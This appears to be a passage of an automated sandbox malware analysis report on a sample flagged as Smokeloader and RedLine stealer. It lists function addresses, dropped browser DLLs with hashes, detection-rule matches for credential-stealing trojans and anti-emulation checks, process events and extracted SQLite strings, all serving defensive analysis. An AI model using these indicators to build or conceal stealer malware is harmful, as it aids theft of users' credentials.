                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D05C9E09_2_6D05C9E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF749F09_2_6CF749F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0148409_2_6D014840
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD09A09_2_6CFD09A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFA9A09_2_6CFFA9A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF789609_2_6CF78960
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D02C8C09_2_6D02C8C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0468E09_2_6D0468E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF969009_2_6CF96900
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFBEA809_2_6CFBEA80
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFBCA709_2_6CFBCA70
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF8A309_2_6CFF8A30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D02EBD09_2_6D02EBD0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D046BE09_2_6D046BE0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D044BE09_2_6D044BE0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFEEA009_2_6CFEEA00
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFE0BA09_2_6CFE0BA0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D040AC09_2_6D040AC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF864D09_2_6CF864D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDA4D09_2_6CFDA4D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0445409_2_6D044540
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0885509_2_6D088550
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF584609_2_6CF58460
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFCA4309_2_6CFCA430
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA44209_2_6CFA4420
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D00A5E09_2_6D00A5E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFCE5F09_2_6CFCE5F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF345B09_2_6CF345B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D06A4809_2_6D06A480
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFE05709_2_6CFE0570
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA25609_2_6CFA2560
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF985409_2_6CF98540
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF9E6E09_2_6CF9E6E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDE6E09_2_6CFDE6E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF646D09_2_6CF646D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF9C6509_2_6CF9C650
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF6A7D09_2_6CF6A7D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC07009_2_6CFC0700
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0241309_2_6D024130
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF500B09_2_6CF500B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF380909_2_6CF38090
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF8E0709_2_6CF8E070
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D00C0009_2_6D00C000
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0080109_2_6D008010
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF401E09_2_6CF401E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01C0B09_2_6D01C0B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA81409_2_6CFA8140
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFB61309_2_6CFB6130
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D05C3609_2_6D05C360
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0823709_2_6D082370
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC82609_2_6CFC8260
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD82509_2_6CFD8250
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D00A2109_2_6D00A210
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF943E09_2_6CF943E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0182209_2_6D018220
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF9E3B09_2_6CF9E3B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF723A09_2_6CF723A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF423709_2_6CF42370
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD63709_2_6CFD6370
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0122A09_2_6D0122A0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D00E2B09_2_6D00E2B0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF483409_2_6CF48340
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C62C09_2_6D0C62C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFB23209_2_6CFB2320
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDFC809_2_6CFDFC80
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D089D909_2_6D089D90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF43C409_2_6CF43C40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D011DC09_2_6D011DC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF51C309_2_6CF51C30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D069C409_2_6D069C40
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D04DC609_2_6D04DC60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF33D809_2_6CF33D80
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D07DCD09_2_6D07DCD0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D001CE09_2_6D001CE0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA3D009_2_6CFA3D00
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D097F209_2_6D097F20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D043F309_2_6D043F30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF63EC09_2_6CF63EC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D05DFC09_2_6D05DFC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C3FC09_2_6D0C3FC0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFEBFF09_2_6CFEBFF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D04DE109_2_6D04DE10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF61F909_2_6CF61F90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C5E609_2_6D0C5E60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D09BE709_2_6D09BE70
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF35F309_2_6CF35F30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF75F209_2_6CF75F20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D08F9009_2_6D08F900
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF4D8E09_2_6CF4D8E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF738E09_2_6CF738E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFDF8C09_2_6CFDF8C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0119909_2_6D011990
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF9D8109_2_6CF9D810
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA59F09_2_6CFA59F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD79F09_2_6CFD79F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF799D09_2_6CF799D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFD99C09_2_6CFD99C0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0138409_2_6D013840
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF519809_2_6CF51980
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFBF9609_2_6CFBF960
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFFD9609_2_6CFFD960
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFF59209_2_6CFF5920
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01F8F09_2_6D01F8F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D09B8F09_2_6D09B8F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF41AE09_2_6CF41AE0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01FB609_2_6D01FB60
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D025B909_2_6D025B90
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D009BB09_2_6D009BB0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF7FA109_2_6CF7FA10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFE1A109_2_6CFE1A10
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF87BF09_2_6CF87BF0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D03DA309_2_6D03DA30
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF99BA09_2_6CF99BA0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0C9A509_2_6D0C9A50
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF31B809_2_6CF31B80
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D01DAB09_2_6D01DAB0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF8BB209_2_6CF8BB20
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CF414E09_2_6CF414E0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D08F5109_2_6D08F510
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0375D09_2_6D0375D0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFCD4109_2_6CFCD410
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFC55F09_2_6CFC55F0
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6D0294309_2_6D029430
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HJJJECFIECBG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HJJJECFIECBG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: String function: 004087A0 appears 54 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: String function: 0040F5A0 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: String function: 020FF807 appears 139 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: String function: 020F8A07 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6D0CD930 appears 57 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6D0C09D0 appears 305 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6CF69B10 appears 98 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6D079F30 appears 52 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6CF63620 appears 95 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6CF9C5E0 appears 35 times
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: String function: 6D0CDAE0 appears 72 times
                Source: C:\Users\user\AppData\Local\Temp\F441.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                Source: 4.exe, 00000000.00000002.1712269261.0000000002C8C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesFilezera2 vs 4.exe
                Source: 4.exeBinary or memory string: OriginalFilenamesFilezera2 vs 4.exe
                Source: 4.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/35@7/9
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpCode function: 9_2_6CFA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,9_2_6CFA0300
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF20CD CreateToolhelp32Snapshot,Module32First,0_2_02EF20CD
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0042B20E CoCreateInstance,6_2_0042B20E
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sdveeeuJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3192
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F441.tmpJump to behavior
                Source: 4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: softokn3[1].dll.9.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: softokn3[1].dll.9.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: softokn3[1].dll.9.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
